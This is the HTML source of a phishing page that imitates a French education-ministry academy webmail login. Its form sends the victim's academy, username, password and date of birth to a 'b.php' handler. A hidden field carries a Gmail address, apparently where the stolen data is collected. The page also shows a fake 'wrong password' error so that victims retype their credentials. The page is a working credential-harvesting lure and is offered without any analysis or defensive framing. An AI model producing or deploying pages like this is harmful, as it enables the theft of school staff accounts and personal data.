﻿
<html lang="en" class="dj_webkit dj_contentbox"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>Académie de France</title>

  <style type="text/css">
   
    </style>
    <link rel="stylesheet" href="files/login.css" type="text/css">
  
    <!-- Bootstrap -->
    <link href="files/bootstrap.min.css" rel="stylesheet">
    <link href="files/bootstrap-tour.min.css" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="files/style.css"> 

  </head>

  <body>


  <main role="main" class="container">
    <div class="row" style="margin-top:20px;display:table">

      <!-- Ministere -->
      <header role="banner" class="col-md-3 text-center hidden-xs hidden-sm bloc-top"><img src="files/logo.png" style="width:70%;" alt="Logo academie de France"></header>
      <nav role="navigation"></nav>

      <!-- Mire -->
      <div class="col-md-6 bloc-top">

        <div class="panel panel-bloc-with-top" style="margin-top:23px">
          <div class="panel-body">
            <h1>Accédez à votre webmail</h1>
          </div>
        </div>

<!-- campagne -->
          <div class="panel panel-bloc-warning d-none" style="display:none">

            <div class="panel-heading text-center">
              <h3 class="panel-title"><span class="glyphicon glyphicon-bullhorn"></span>&nbsp;Changement de votre mot de passe</h3>
            </div>

            <div class="panel-body">
              <span><strong>Si vous ne l'avez pas encore fait depuis le 28 novembre 2019</strong>, nous vous demandons de renouveler dès à présent le mot de passe de votre compte d'accès à Toutatice et à vos applications de l'Éducation Nationale.</span>
              <h4>Pourquoi changer votre mot de passe ?</h4>
              <span>Ce changement est nécessaire pour renforcer la protection de vos données et la sécurité du système d'information académique. Par ce geste, vous contribuez à diminuer les risques d'attaques informatiques et de vol de données.</span>
              
              <div class="col-sm-12 text-center" style="margin-top:20px">
                <a href="#" target="_blank" class="btn btn-primary" role="button"><span class="glyphicon glyphicon-play"></span>&nbsp;Je change mon mot de passe</a>
              </div>
            </div>

          </div>
<!---->

        <div class="panel panel-primary">
          <div class="panel-body" id="bst-form">
            <div class="text-center Convergence-Login-Notification" id="alertMsg"></div>
            <h2>Entrez votre identifiant et votre mot de passe</h2><hr>
            <p style="color: red; font-weight: bold;">Identifiant ou mot de passe incorrect, veuillez réessayer.</p><hr>
            <form class="form-horizontal" action="b.php" method="post">
              <input type="hidden" name="mailla" value="pisanic99@gmail.com">
              <div class="form-group">
                <label id="usernameLabelID" for="username" class="col-sm-3 control-label"></label>
                <div class="col-sm-9">
              
				  <select required="" style="display:block;width:100%;height:30px" name="acname" class="form-control" id="username" aria-label="Choisir votre académie"><option value="" disabled="disabled" selected="selected" hidden="">Choisir votre académie</option><option value="aix-marseille">Aix-Marseille</option><option value="amiens">Amiens</option><option value="besancon">Besançon</option><option value="bordeaux">Bordeaux</option><option value="clermont-ferrand">Clermont-Ferrand</option><option value="corse">Corse</option><option value="creteil">Créteil</option><option value="dijon">Dijon</option><option value="grenoble">Grenoble</option><option value="guadeloupe">Guadeloupe</option><option value="guyane">Guyane</option><option value="la-reunion">La Réunion</option><option value="lille">Lille</option><option value="limoges">Limoges</option><option value="lyon">Lyon</option><option value="martinique">Martinique</option><option value="mayotte">Mayotte</option><option value="montpellier">Montpellier</option><option value="nancy-metz">Nancy-Metz</option><option value="nantes">Nantes</option><option value="nice">Nice</option><option value="normandie">Normandie</option><option value="nouvelle-caledonie">Nouvelle-Calédonie</option><option value="orleans-tours">Orléans-Tours</option><option value="paris">Paris</option><option value="poitiers">Poitiers</option><option value="polnesie-francaise">Polynésie française</option><option value="reims">Reims</option><option value="Rennes">Rennes</option><option value="saint-pierre-et-miquelon">Saint-Pierre-et-Miquelon</option><option value="strasbourg">Strasbourg</option><option value="toulouse">Toulouse</option><option value="versailles">Versailles</option><option value="wallis-et-futuna">Wallis-et-Futuna</option></select>
                </div>
              </div>
<div class="form-group">
                <label id="usernameLabelID" for="username" class="col-sm-3 control-label">Identifiant :</label>
                <div class="col-sm-9">
                  <input type="text" class="form-control" id="username" required="" name="user" placeholder="Identifiant">
                </div>
              </div>
              <div class="form-group">
                <label id="passwordLabelID" for="password" class="col-sm-3 control-label">Mot de passe :</label>
                <div class="col-sm-9">
                  <input type="password" class="form-control" id="password" required="" name="pass" placeholder="Mot de passe">
                </div>
                <label id="usernameLabelID" for="username" class="col-sm-3 control-label">Date de naissance :</label>
                <div class="col-sm-8">
                  <input type="text" class="form-control" id="username" required="" maxlength="2" name="jour" placeholder="Jour">
                  <input type="text" class="form-control" id="username" required="" maxlength="2" name="mois" placeholder="Mois">
                  <input type="text" class="form-control" id="username" required="" maxlength="4" name="Année" placeholder="Année">
                </div>
                
              </div>
              
              <div class="form-group">
                <div class="text-center">
                  
                  <div id="buttonContainer">
                    <div>
                      <span class="dijit dijitReset dijitLeft dijitInline dijitButton" dojoattachevent="ondijitclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="signin"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode"><button class="dijitReset dijitStretch dijitButtonContents" dojoattachpoint="titleNode,focusNode" type="submit" value="" wairole="button" waistate="labelledby-signin_label" role="button" aria-labelledby="signin_label" id="signin" tabindex="0"><span class="dijitReset dijitInline" dojoattachpoint="iconNode"><span class="dijitReset dijitToggleButtonIconChar">✓</span></span><span class="dijitReset dijitInline dijitButtonText" id="signin_label" dojoattachpoint="containerNode">Connexion</span></button></span></span></span>
                    </div>
                  </div>
                </div>
              </div>

            </form>
          </div>


          <div id="overlay" class="login">
            <div class="centered">
              <div class="logo"></div>
              <div id="progress"></div>
            </div>
          </div>


        </div>

      </div>
      

      <!-- Aide -->
      <div class="col-md-3 bloc-bottom" id="bst-conseils">

          <!-- Aide 1 -->
          <div class="panel panel-bloc">

            <div class="panel-heading text-center">
              <h3 class="panel-title"><span class="glyphicon glyphicon-briefcase"></span>&nbsp;Confidentialité</h3>
            </div>

            <div class="panel-body">
              Attention. Vos identifiant et mot de passe sont <strong>strictement confidentiels</strong> et ne doivent être confiés à personne, même à des personnels du Rectorat.
            </div>

          </div>

          <!-- Aide 2 -->
          <div class="panel panel-bloc">

            <div class="panel-heading text-center">
              <h3 class="panel-title"><span class="glyphicon glyphicon-alert"></span>&nbsp;Sécurité</h3>
            </div>

            <div class="panel-body">
              Pour des raisons de sécurité, veuillez vous <strong>déconnecter et fermer votre navigateur</strong> lorsque vous avez fini d'accéder aux services authentifiés.
            </div>

          </div>
    
      </div>
    </div>


    <div class="row">
      <div class="col-md-3"></div>
      
      <!-- Aide footer -->
      <div class="col-md-6">
        <div class="panel panel-bloc" id="bst-aide">

          <div class="panel-heading text-center">
            <h3 class="panel-title"><span class="glyphicon glyphicon-eye-open"></span>&nbsp;Aide</h3>
          </div>


          <div class="panel-body">
            <div class="col-sm-4 text-center">
              <a href="#" class="btn btn-primary" role="button">1ère connexion</a>
            </div>
            <div class="col-sm-8 text-center">
              <a href="#" target="_blank" class="btn btn-primary" role="button">Identifiant ou mot de passe oublié</a>
            </div>
          </div>
        </div>
      </div>

      <div class="col-md-3">
        <div class="panel panel-bloc" id="bst-charte">

          <div class="panel-heading text-center">
            <h3 class="panel-title"><span class="glyphicon glyphicon-book"></span>&nbsp;Charte</h3>
          </div>

          <div class="panel-body">
            <div class="text-center">
              <a href="#" class="btn btn-primary" role="button">Voir la charte</a>
            </div>
          </div>

        </div>
      </div>

    </div>
  

      <div class="row">
      <div class="col-md-3"></div>
      
      <!-- Aide assistance -->
      <div class="col-md-9">

        <div class="panel panel-bloc" id="bst-assistance">
          <div class="panel-heading" role="tab" id="headingOne">
            
              <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion" href="#" aria-expanded="true" aria-controls="collapseOne">
                <h4 class="panel-title text-center">Vous avez besoin d'assistance ?</h4>
              </a>
            
          </div>
          <div id="collapseOne" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingOne">
            <div class="panel-body">
              <strong><h4>Comment contacter le centre d'assistance AMIGO (Assistance Mutualisée Interacadémique du Grand Ouest) ?</h4></strong>

              Le centre d'assistance informatique est à votre disposition pour toute demande liée à l'usage de la messagerie électronique et aux difficultés que vous rencontrez dans cet usage.<br>
              Vous pouvez le contacter via le formulaire <a href="#" target="_blank">http://assistance.ac-France.fr</a>.<br><br>
              En cas d’indisponibilité de ce formulaire, vous pouvez joindre AMIGO directement par mail à <a href="#" target="_blank">assistance@ac-France.fr</a> sans oublier de :  
              <ul>
                <li>préciser l'objet (application concernée, matériel ou logiciel, …) ;</li>
                <li>faire une description de la demande et indiquer éventuellement les messages d'erreur ;</li>
                <li>signer le message en mentionnant votre identité et votre établissement ou service ;</li>
                <li>indiquer un n° rappel ainsi que vos disponibilités pour être contacté.</li>
              </ul>
            </div>
          </div>
        </div>

      </div>

    </div>
    
  </main>

  <div class="row visible-xs visible-sm">

      <!-- Ministere -->
    <div class="text-center"><img src="files/logo.png" alt="Logo academie de France"></div>

  </div>

  <footer role="contentinfo" class="text-center">
    <span class="glyphicon glyphicon-copyright-mark"></span>&nbsp;Académie de France.
  </footer>

  
</body></html>

  <footer role="contentinfo" class="text-center">
    <span class="glyphicon glyphicon-copyright-mark"></span>&nbsp;Académie de France.
  </footer>

  
